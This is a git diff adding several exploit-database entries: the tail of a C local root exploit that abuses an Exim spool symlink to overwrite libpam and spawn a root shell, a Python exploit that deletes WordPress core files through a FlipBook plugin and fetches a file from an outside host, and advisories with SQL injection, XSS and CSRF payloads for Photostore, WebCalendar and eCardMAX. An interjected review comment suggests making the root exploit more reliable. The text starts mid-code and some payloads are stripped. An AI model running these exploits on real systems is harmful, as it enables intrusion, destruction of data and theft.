newStatData.st_size); + assert(result==newStatData.st_size); + fsync(targetFd); + + childPid=fork(); + if(!childPid) { + execArgs[0]="/bin/su"; + execArgs[1]=NULL; + result=execve(execArgs[0], execArgs, environ); + assert(!result); + return(0); + } + waitpid(childPid, NULL, 0); + + ftruncate(targetFd, 0); + lseek(targetFd, 0, SEEK_SET); + result=write(targetFd, origData, origStatData.st_size); + close(targetFd); + + childPid=fork(); + if(!childPid) { + char numbers[128]; + char *ptr=numbers; + execArgs[0]=UPGRADE_FILE_NAME; + execArgs[1]="--Repair"; + result=sprintf(ptr, "%d", origStatData.st_uid); + execArgs[2]=ptr; ptr+=result+1; + result=sprintf(ptr, "%d", origStatData.st_gid); + execArgs[3]=ptr; ptr+=result+1; + result=sprintf(ptr, "%d", origStatData.st_mode); + execArgs[4]=ptr; + execArgs[5]=NULL; + result=execve(execArgs[0], execArgs, environ); + assert(!result); + return(0); + } + waitpid(childPid, NULL, 0); + + execArgs[0]=UPGRADE_FILE_NAME; + execArgs[1]="--Exec"; + execArgs[2]="/bin/bash"; + execArgs[3]="-c"; + execArgs[4]="id; exec $0"; + execArgs[5]=NULL; + execve(execArgs[0], execArgs, environ); + return(1); + } + fprintf(stderr, "Usage: %s --Upgrade or --Exec [args]\n", argv[0]); + return(1); +} diff --git a/platforms/php/webapps/40051.txt b/platforms/php/webapps/40051.txt new file mode 100755 index 000000000..5d19192b9 --- /dev/null +++ b/platforms/php/webapps/40051.txt 
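Review bot: The restore of the original library after the `su` child returns, `result=write(targetFd, origData, origStatData.st_size); close(targetFd);`, is the only write in `--Upgrade` whose result is not asserted, so a short write leaves the system library truncated while the following `--Repair` step restores only ownership and mode; `assert(result==origStatData.st_size);` before the `close` keeps it consistent with the replacement write and both reads. Every `stat()` call is likewise unchecked, and `--Repair` opens TARGET_PATH read-write without ever closing `targetFd`. `stat(TARGET_PATH, ¤tStatData);` in the wait loop reads as an HTML-entity mangling of `&currentStatData` in this rendering rather than the committed source — confirm before relying on the text. From the defender's side, the visible sequence is a symlink created under `/var/spool/exim4/input/` that points at `/lib/x86_64-linux-gnu/libpam.so.0.83.1`, followed by a change of that file's owner, so ownership monitoring on system libraries and symlink checks inside the spool catch it independently of the Exim version.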
@@ -0,0 +1,99 @@ +#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# +# Ktools Photostore <= 4.7.5 Multiple Vulnerabilities +# Bug discovered by Yakir Wizman +# Date 01/07/2016 +# Affected versions prior to 4.7.5 +# Vendor Homepage - http://www.ktools.net + +#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# +# Author will be not responsible for any damage. +#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# +# About the Application: +#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# +# PhotoStore is a professional photo gallery & shopping cart software which contain the following basic features as described bellow: +# +# Sell various sizes or formats of the same photo. +# Sell photos, vector art, zip files and more. +# Sell videos PhotoStore Pro Only +# Sell prints, artwork, products, packages, digital collections and more. +# Built in shopping cart and ecommerce system to accept credit cards and/or check payments. +# Email notifications to both you and the customer upon purchase. +# Customers can instantly download after payment. +# Customers can instantly download their files after payment. +# Connects to PayPal and 2Checkout. +# Built in credit system to allow your customers to buy credits. +# Allow your members to upload and sell their photos and other media while you take a commission. + +# The vulnerabilities which are described bellow does not require any legitimate user to exploit them. +# The Photostore application is prone to a multiple vulnerabilities such as SQL Injection & Cross Site Scripting and does not require any legitimate user or admin privilege to exploit them. +# A potentially attacker can exploit those vulnerabilities to retrieve all the data stored in the application's database (In case of SQL Injection vulnerability), Cookie Stealing / Phishing attacks (In case of Cross site scripting vulnerability). 
+
+
+
+# SQL Injection (error based) Proof-Of-Concept
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# SQL Injection (Severity is Critical)
+# The vulnerable parameter is “gallerySortType” which is not sanitized and sent by the user in order retrieve the gallery objects ordered by ASC or DESC in sql query.
+# Request Data #1 is:
+
+POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
+Cache-Control: no-cache
+Referer: http://www.example.net/photostore/gallery/Objects/24/page1/
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
+Accept-Language: en-us,en;q=0.5
+Host: www.ktoolsdemos.net
+Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
+Accept-Encoding: gzip, deflate
+Content-Length: 221
+Content-Type: application/x-www-form-urlencoded
+
+postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD]
+
+# Inserted payload for example:
+postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+###
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+###
+# The vulnerable parameter is “gallerySortBy” which is not sanitized and sent by the user in order retrieve the gallery objects selected by kind-of-type in sql query.
+# Request Data #2 is:
+
+POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
+Cache-Control: no-cache
+Referer: http://server/photostore/gallery/Objects/24/page1/
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
+Accept-Language: en-us,en;q=0.5
+Host: server
+Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
+Accept-Encoding: gzip, deflate
+Content-Length: 57
+Content-Type: application/x-www-form-urlencoded
+
+postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc
+
+# Inserted payload for example:
+postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc
+
+
+
+# Cross Site Scripting Proof—Of-Concept
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# XSS (Severity is Medium)
+# The vulnerable parameter is “mediaID” in “workbox.php” file and the parameter “password” in “/mgr.login.php” file which is not sanitized and sent by the user to the application
+#
+# In Order to exploit this vulnerability, the URL should be like the following examples:
+#
+# http://server/photostore/workbox.php?mode=addToLightbox&mediaID=“>
+# http://server/photostore/manager/mgr.login.php?username=demo&password='>alert(/makman/)'}
+ imageUrl = 'http://makman.tk/makman.jpg'
+ wpFilesUrl = 'http://makman.tk/wpFiles.json'
+
+ def __init__(self, url):
+ url = url.rstrip('/')
+ if 'http://' in url or 'https://' in url:
+ self.url = url
+ else:
+ self.url = 'http://' + url
+
+ def http(self, url, data = {}, post = False):
+ try:
+ if post:
+ r = requests.post(url, data = data, headers = self.headers, timeout = 20)
+ else:
+ r = requests.get(url, params = data, headers = self.headers, timeout = 20)
+ except:
+ exit('[-] Something went wrong. Please check your internet connection')
+ return r
+
+ def deleteFiles(self):
+ print('[+] Loading Wordpress file structure')
+ r = self.http(self.wpFilesUrl)
+ wpFiles = json.loads(r.text)
+ print('[+] Wordpress File structure loaded successfully')
+ print('[+] Creating directory real3dflipbook')
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', {'imgbase' : 'makman'}, True)
+ print('[+] Deleting Files from wp-includes/ & wp-admin/')
+ for wpFile in wpFiles['wpFiles']:
+ print(' [+] Deleting File ' + wpFile)
+ self.payload1['deleteBook'] = wpFile
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True)
+ print('[+] Files have been deleted successfully')
+
+ def uploadImage(self):
+ print('[+] Loading image file')
+ r = self.http('http://makman.tk/makman.jpg')
+ encodedImage = base64.b64encode(r.content)
+ self.payload2['imgbase'] = ';,' + encodedImage.decode('utf-8')
+ print('[+] Uploading image file in target root directory')
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)
+ print('[+] Image has been uploaded here ' + self.url + '/' + self.payload2['pageName'] + '.jpg')
+
+ def xss(self):
+ print('[+] Checking XSS payload')
+ r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3)
+ if self.payload3['bookId'] in r.text:
+ print('[+] Found XSS here :')
+ print(' [+] ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3['action'] + '&bookId=' + self.payload3['bookId'])
+
+#########################################################################################################
+
+def banner():
+ os.system('cls' if os.name == 'nt' else 'clear')
+ tabs = ' '
+ print(tabs + '*******************************************************************')
+ print(tabs + '* [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin *')
+ print(tabs + '* [+] Multiple Vulnerabilities Found by: *')
+ print(tabs + '* [+] https://mukarramkhalid.com *')
+ print(tabs + '*******************************************************************\n\n')
+
+def main():
+ banner()
+ url = input('[+] Enter Url\n[+] E.g. http://server or http://server/wordpress\n[+] ')
+ exploit = wpFlipbook(url)
+ exploit.deleteFiles()
+ exploit.uploadImage()
+ exploit.xss()
+ print('[+] Done')
+
+if __name__ == '__main__':
+ try:
+ main()
+ except KeyboardInterrupt:
+ exit('\n[-] CTRL-C detected.\n')
+# End
\ No newline at end of file
diff --git a/platforms/php/webapps/40057.txt b/platforms/php/webapps/40057.txt
new file mode 100755
index 000000000..406c391be
--- /dev/null
+++ b/platforms/php/webapps/40057.txt
@@ -0,0 +1,269 @@
+[+] Credits: John Page aka HYP3RLINX
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==========================
+www.k5n.us/webcalendar.php
+
+
+
+Product:
+==================
+WebCalendar v1.2.7
+
+WebCalendar is a PHP-based calendar application that can be configured as a
+single-user calendar, a multi-user calendar for groups of users, or as an
+event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
+Interbase, MS SQL Server, or ODBC is required.
+
+WebCalendar can be setup in a variety of ways, such as...
+
+A schedule management system for a single person
+A schedule management system for a group of people, allowing one or more
+assistants to manage the calendar of another user
+An events schedule that anyone can view, allowing visitors to submit new
+events
+A calendar server that can be viewed with iCalendar-compliant calendar
+applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or
+RSS-enabled
+applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.
+
+
+
+
+Vulnerability Type:
+======================
+CSRF PROTECTION BYPASS
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+WebCalendar attempts to uses the HTTP Referer to check that requests are
+originating from same server as we see below.
+
+From WebCalendar "include/functions.php" file on line 6117:
+
+////////////////////////////////////////////////////////////
+
+function require_valide_referring_url ()
+{
+
+ global $SERVER_URL;
+
+
+if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
+
+ // Missing the REFERER value
+
+ //die_miserable_death ( translate ( 'Invalid referring URL' ) );
+
+ // Unfortunately, some version of MSIE do not send this info.
+
+ return true;
+ }
+
+if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
+
+ // Gotcha. URL of referring page is not the same as our server.
+
+// This can be an instance of XSRF.
+
+// (This may also happen when more than address is used for your server.
+
+// However, you're not supposed to do that with this version of
+
+// WebCalendar anyhow...)
+ die_miserable_death ( translate ( 'Invalid referring URL' ) );
+
+ }
+
+}
+
+/////////////////////////////////////////////////////////////////////////////////////////
+
+However, this can be easily defeated by just not sending a referer. HTML 5
+includes a handy tag to omit the
+referer
+when making an HTTP request, currently supported in Chrome, Safari,
+MobileSafari and other WebKit-based browsers. Using this meta tag we send
+no referrer
+and the vulnerable application will then happily process our CSRF requests.
+
+
+
+Exploit code(s):
+===============
+
+1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
+victim user is required for success.
+
+
+
+
+
+
+
+
+
+
+
+
+2) CSRF Protection Bypass modify access controls under "System Settings" /
+"Allow public access"
+
+
+
+

+
+
+
+
+
+
+#######################################################
+
+Vulnerability Type:
+======================
+PHP Code Injection
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+Since WebCalendars install script is not removed after installation as
+there is no "automatic" removal of it, low privileged users can inject
+arbitrary
+PHP code for the "Database Cache" directory value as no input validation
+exists for this when a user installs the application using the WebCalendar
+walk
+thru wizard.
+
+If WebCalendars installation script is available as part of a default
+image, often as a convenience by some hosting providers, this can be used
+to gain
+code execution on the target system. The only item that is required is the
+user must have privileges to authenticate to the MySQL Database and to run
+the
+install script. So, users who have install wizard access for the
+WebCalendar application will now have ability to launch arbitrary system
+commands on the
+affected host.
+
+One problem we must overcome is WebCalendar filters quotes " so we cannot
+use code like However, we can defeat
+this
+obstacle using the all to forgotten backtick `CMD` operator!.
+
+e.g.
+
+*/?>
+
+This results in "settings.php" being injected like...
+
+
+readonly: false
+user_inc: user.php
+use_http_auth: false
+single_user: false
+# end settings.php */
+?>
+
+
+
+Exploitation steps(s):
+=====================
+
+1) Login to the WebCalendar Installation Wizard.
+
+2) When you get to WebCalendar Installation Wizard Step 2 of the install
+script.
+http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2
+
+3) Click "Test Settings" button to ensure connection to the Database.
+4) Enter below PHP code for the "Database Cache Directory:" input fields
+value to pop calculator for POC (Windows).
+
+*/?>
+
+5) Click "Next" button
+6) Click "Next" button
+7) Click "Save settings" button
+
+BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.
+
+If you happen to get following error when clicking "Test Settings" button,
+"Failure Reason: Database Cache Directory does not exist", just click back
+button then forward or just "Test settings" button again to try get past
+the error.
+
+
+Disclosure Timeline:
+===============================
+Vendor Notification: No replies
+July 4, 2016 : Public Disclosure
+
+
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+
+Severity Level:
+================
+6.8 (Medium)
+CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+HYP3RLINX
diff --git a/platforms/php/webapps/40058.txt b/platforms/php/webapps/40058.txt
new file mode 100755
index 000000000..30405c510
--- /dev/null
+++ b/platforms/php/webapps/40058.txt
@@ -0,0 +1,98 @@
+eCardMAX 10.5 SQL Injection and XSS Vulnerabilities
+
+
+[Software]
+
+- eCardMAX 10.5
+
+
+[Vendor]
+
+- eCardMAX.COM - http://www.ecardmax.com/
+
+
+[Vendor Product Description]
+
+- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your
+own ecard website with many of the advanced features found on other major sites. Starting your own ecard website
+with eCardMax is fast and easy.
+
+
+[Advisory Timeline]
+
+- 13/06/2016 -> Vulnerability discovered;
+- 13/06/2016 -> First contact with vendor;
+- 13/06/2016 -> Vendor responds asking for details;
+- 14/06/2016 -> Vulnerability details sent to the vendor;
+- 17/06/2016 -> Vendor working on a patch;
+- 28/06/2016 -> Vendor Releases Patch
+- 01/07/2016 -> Public Security Advisory Published
+
+
+[Bug Summary]
+
+- SQL Injection
+
+- Cross Site Scripting (Reflected)
+
+
+[Impact]
+
+- High
+
+
+[Affected Version]
+
+- v10.5
+
+
+[Tested on]
+
+- Apache/2.2.26
+- PHP/5.3.28
+- MySQL/5.5.49-cll
+
+
+[Bug Description and Proof of Concept]
+
+- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly
+sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
+arbitrary SQL code.
+
+- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters
+is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's
+browser session in context of an affected site.
+
+
+[Proof-of-Concept]
+
+1. SQL Injection:
+
+Parameter: row_number (GET)
+POC URL:
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+2. Cross Site Scripting (Reflected):
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User
+Parameter(s): keyword (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
+Parameter(s): page (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2
+Parameter(s): row_number (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E
+Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page (GET)
+
+http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E
+Parameter(s): keyword (GET)
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+All flaws described here were discovered and researched by:
+
+Bikramaditya Guha aka "PhoenixX"
\ No newline at end of file